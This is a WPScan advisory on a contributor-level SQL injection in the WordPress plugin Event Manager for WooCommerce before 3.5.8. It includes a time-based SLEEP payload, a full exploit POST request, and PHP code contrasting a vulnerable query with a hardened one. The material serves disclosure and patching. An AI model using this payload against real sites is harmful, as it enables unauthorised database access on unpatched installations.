wpvulndb | Rafael Castilho | WPVDB-ID: D881D725-D06B-464F-A25E-88F41B1F431F
History: Feb 21, 2022 - 12:00 a.m.

Event Manager for WooCommerce < 3.5.8 - Contributor+ SQL Injection

2022-02-21 00:00:00
Rafael Castilho
wpscan.com
5

EPSS: 0.001 (Low) | Percentile: 41.2%

The plugin does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks.

PoC

Create or edit an event as a contributor, intercept the request and append the following payload to the post_author_gutenberg POST parameter: //WHERE//ID=VALID_POST_EVENT_ID//AND//SLEEP(10)//--

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1742
Connection: close
Cookie: [contributor+]
Upgrade-Insecure-Requests: 1

_wpnonce=89e8e9bf38&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=mep_events&original_post_status=pending&post_ID=5724&meta-box-order-nonce=b0848a8368&closedpostboxesnonce=d77823a21d&original_post_title=Contrib+SQLi&post_title=Contrib+SQLi&samplepermalinknonce=3929b239b6&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bmep_cat%5D%5B%5D=0&tax_input%5Bmep_org%5D%5B%5D=0&mep_event_template=default-theme.php&mep_fw_nonce=bd4f075693&mep_list_thumbnail=&post_author_gutenberg=5//WHERE//ID=5724//AND//SLEEP(10)//–&mep_org_address=0&mep_location_venue=&mep_street=&mep_city=&mep_state=&mep_postcode=&mep_country=&mep_event_ticket_type_nonce=3a65192659&option_name_t%5B%5D=&option_price_t%5B%5D=&option_qty_t%5B%5D=&option_default_qty_t%5B%5D=&option_rsv_t%5B%5D=&option_sale_end_date%5B%5D=&option_sale_end_time%5B%5D=&option_qty_t_type%5B%5D=&mep_events_extra_price_nonce=14d31c6699&option_name%5B%5D=&option_price%5B%5D=&option_qty%5B%5D=&option_qty_type%5B%5D=&event_start_date=&event_start_time=&event_end_date=&event_end_time=00%3A00&event_more_start_date%5B%5D=&event_more_start_time%5B%5D=&event_more_end_date%5B%5D=&event_more_end_time%5B%5D=&mep_event_ricn_text_nonce=8e31f2b499&mep_rich_text_status=enable&mep_rt_event_status=EventRescheduled&mep_rt_event_attandence_mode=OfflineEventAttendanceMode&mep_rt_event_prvdate=2022-02-02+13%3A25%3A04&mep_event_reg_btn_nonce=c702a3ef44&mep_event_sku=&mep_reg_status=on&mep_show_end_datetime=yes&mep_event_reg_btn_nonce=c702a3ef44&mep_available_seat=on&mep_event_reset_btn_nonce=11ce7e0cfd&mp_event_virtual_type_des=&mep_member_only_user_role%5B%5D=all&mep_fw_nonce=bd4f075693&mep_event_cc_email_text=&excerpt=
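The defect class described above, as an added illustration that is not the plugin's own code: a hypothetical save handler that interpolates the post_author_gutenberg value straight into an UPDATE statement, beside a hardened version that coerces the value to an integer, checks the caller's capability, and binds it through $wpdb->prepare. The function names are invented; the WordPress APIs (absint, wp_unslash, current_user_can, get_userdata, $wpdb->prepare) are real.

```php
<?php
// Added illustration of the pattern in the advisory; not code from
// Event Manager for WooCommerce. Function names are hypothetical.

// VULNERABLE PATTERN: the raw POST value becomes part of the SQL text,
// so anything appended after the author id is executed as SQL.
function mep_example_save_author_vulnerable( int $post_id ) {
    global $wpdb;
    $author = $_POST['post_author_gutenberg'] ?? '';
    $wpdb->query( "UPDATE {$wpdb->posts} SET post_author = {$author} WHERE ID = {$post_id}" );
}

// HARDENED PATTERN: capability check, integer coercion, prepared statement.
function mep_example_save_author_hardened( int $post_id ): bool {
    global $wpdb;
    // Only someone allowed to edit this post may touch its author field.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return false;
    }
    if ( ! isset( $_POST['post_author_gutenberg'] ) ) {
        return false;
    }
    // absint() keeps only the leading non-negative integer; a value such as
    // the PoC string above collapses to 5 and no SQL text survives.
    $author = absint( wp_unslash( $_POST['post_author_gutenberg'] ) );
    if ( 0 === $author || false === get_userdata( $author ) ) {
        return false; // not a real user id
    }
    // A contributor may assign only themselves; reassigning to another
    // user requires edit_others_posts.
    if ( $author !== get_current_user_id() && ! current_user_can( 'edit_others_posts' ) ) {
        return false;
    }
    // %d placeholders: the values are bound as integers, never concatenated.
    return (bool) $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$wpdb->posts} SET post_author = %d WHERE ID = %d",
            $author,
            $post_id
        )
    );
}
```

In a real plugin the author field would normally go through wp_update_post() rather than a direct UPDATE, which applies the same capability and integer checks for you.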

CPE Name        Operator  Version
mage-eventpress lt        3.5.8
